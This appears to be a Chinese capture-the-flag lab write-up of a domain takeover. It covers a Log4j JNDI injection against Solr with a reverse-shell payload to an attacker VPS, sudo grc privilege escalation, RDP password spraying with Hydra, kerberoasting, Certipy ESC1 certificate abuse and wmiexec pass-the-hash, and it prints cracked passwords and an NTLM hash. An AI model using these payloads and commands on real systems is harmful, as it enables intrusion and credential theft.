fscan扫一下
1
2
3
4
5
6
7
8
9
10
| ___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.98.122.181:8983 open
39.98.122.181:22 open
39.98.122.181:80 open
|
jndi注入
8983端口用了log4j
dns外带测试一下
1
| http://39.98.122.181:8983/solr/admin/collections?action=${jndi:ldap://ew7eu8.dnslog.cn}
|
收到了
vps起jndiexploit,
1
| java -jar JNDIExploit-1.4-SNAPSHOT.jar -i VPS_IP
|
payload,同时监听9383端口
1
2
3
4
5
6
7
8
| GET /solr/admin/collections?action=${jndi:ldap://VPS_IP:1389/Basic/ReverseShell/VPS_IP/9383} HTTP/1.1
Host: 39.99.154.173:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
|
suid没找到提权,尝试sudo
grc提权
https://gtfobins.github.io/gtfobins/grc/
1
| sudo grc find / -name flag*
|
1
| sudo grc cat /root/flag/flag01.txt
|
内网渗透
接着搭代理,传fscan扫一下9网段
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| ___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.9.19 is alive
(icmp) Target 172.22.9.47 is alive
(icmp) Target 172.22.9.7 is alive
(icmp) Target 172.22.9.26 is alive
[*] Icmp alive hosts len is: 4
172.22.9.7:135 open
172.22.9.19:8983 open
172.22.9.47:21 open
172.22.9.19:80 open
172.22.9.47:22 open
172.22.9.19:22 open
172.22.9.26:445 open
172.22.9.7:445 open
172.22.9.47:445 open
172.22.9.26:139 open
172.22.9.7:139 open
172.22.9.47:139 open
172.22.9.26:135 open
172.22.9.7:88 open
172.22.9.7:80 open
172.22.9.47:80 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.9.26
[->]DESKTOP-CBKTVMO
[->]172.22.9.26
[*] NetBios 172.22.9.7 [+] DC:XIAORANG\XIAORANG-DC
[*] NetInfo
[*]172.22.9.7
[->]XIAORANG-DC
[->]172.22.9.7
[*] NetBios 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle http://172.22.9.19 code:200 len:612 title:Welcome to nginx!
[*] NetBios 172.22.9.47 fileserver Windows 6.1
[*] OsInfo 172.22.9.47 (Windows 6.1)
[*] WebTitle http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/
[*] WebTitle http://172.22.9.7 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin
[+] PocScan http://172.22.9.7 poc-yaml-active-directory-certsrv-detect
|
分析一下
1
2
3
4
| 172.22.9.7 XIAORANG-DC
172.22.9.19 当前被控机器
172.22.9.26 DESKTOP-CBKTVMO
172.22.9.47 fileserver
|
题目上标签有smb,猜测是有smb服务,fscan中有一个fileserver,连接试试
1
| proxychains python3 smbclient.py 172.22.9.47
|
secret下拿到
接着回根目录用get personnel.db下一下这个数据库,看了一下有个user表里有密码但没用户名
导入看一下,
一堆用户名和密码,尝试密码喷洒
密码喷洒
1
2
| proxychains4 hydra -L user.txt -P pass.txt 172.22.9.26 rdp >>result.txt
cat result.txt|| grep account
|
尝试出来这两个可以
1
2
| zhangjian:i9XDE02pLVf
liupeng:fiAzGwEMgTY
|
kerberoasting攻击
前面提示说了spn,尝试找域用户下的spn
1
| proxychains4 python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
|
保存下来爆破hash
1
2
| zhangxia:MyPass2@@6
chenchen:@Passw0rd@
|
再rdp上去发现没权限访问admin目录下文件,同时发现了172.22.9.13 CA域成员机
ADCS
再回去看题目说ADCS,猜测是拿那台CA通过证书拿域控,先枚举有哪些证书
1
| proxychains certipy-ad find -u 'liupeng@xiaorang.lab' -password 'fiAzGwEMgTY' -dc-ip 172.22.9.7 -vulnerable -stdout
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
| [*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via CSRA
[proxychains] Strict chain ... 1.92.148.33:5566 ... XIAORANG-DC.xiaorang.lab:135 <--socket error or timeout!
[!] Got error while trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via CSRA: Could not connect: [Errno 111] Connection refused
[*] Trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via RRP
[proxychains] Strict chain ... 1.92.148.33:5566 ... XIAORANG-DC.xiaorang.lab:445 <--socket error or timeout!
[!] Got error while trying to get CA configuration for 'xiaorang-XIAORANG-DC-CA' via RRP: [Errno Connection error (224.0.0.1:445)] [Errno 111] Connection refused
[!] Failed to get CA configuration for 'xiaorang-XIAORANG-DC-CA'
[proxychains] Strict chain ... 1.92.148.33:5566 ... XIAORANG-DC.xiaorang.lab:80 <--socket error or timeout!
[*] Enumeration output:
Certificate Authorities
0
CA Name : xiaorang-XIAORANG-DC-CA
DNS Name : XIAORANG-DC.xiaorang.lab
Certificate Subject : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Certificate Serial Number : 43A73F4A37050EAA4E29C0D95BC84BB5
Certificate Validity Start : 2023-07-14 04:33:21+00:00
Certificate Validity End : 2028-07-14 04:43:21+00:00
Web Enrollment : Disabled
User Specified SAN : Unknown
Request Disposition : Unknown
Enforce Encryption for Requests : Unknown
Certificate Templates
0
Template Name : XR Manager
Display Name : XR Manager
Certificate Authorities : xiaorang-XIAORANG-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Authenticated Users
Object Control Permissions
Owner : XIAORANG.LAB\Administrator
Write Owner Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Administrator
Write Dacl Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Administrator
Write Property Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Administrator
[!] Vulnerabilities
ESC1 : 'XIAORANG.LAB\\Domain Users' and 'XIAORANG.LAB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
|
发现ESC1,改一下hosts
ESC1
申请 XR Manager 证书模版并伪造域管理员,得到administrator.pfx
1
| proxychains4 certipy-ad req -u 'liupeng@xiaorang.lab' -p 'fiAzGwEMgTY' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca "xiaorang-XIAORANG-DC-CA" -template 'XR Manager' -upn administrator@xiaorang.lab
|
利用administrator.pfx证书获取 TGT 和 NTLM Hash
1
| proxychains4 certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7
|
拿到域控hash,打pth
1
| proxychains4 python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7 -codec gbk
|
1
| type C:\Users\Administrator\flag\flag04.txt
|
再上另一台机器,拿3
1
| proxychains python3 wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80 xiaorang.lab/Administrator@172.22.9.26 -codec gbk
|
1
| type C:\Users\Administrator\flag\flag03.txt
|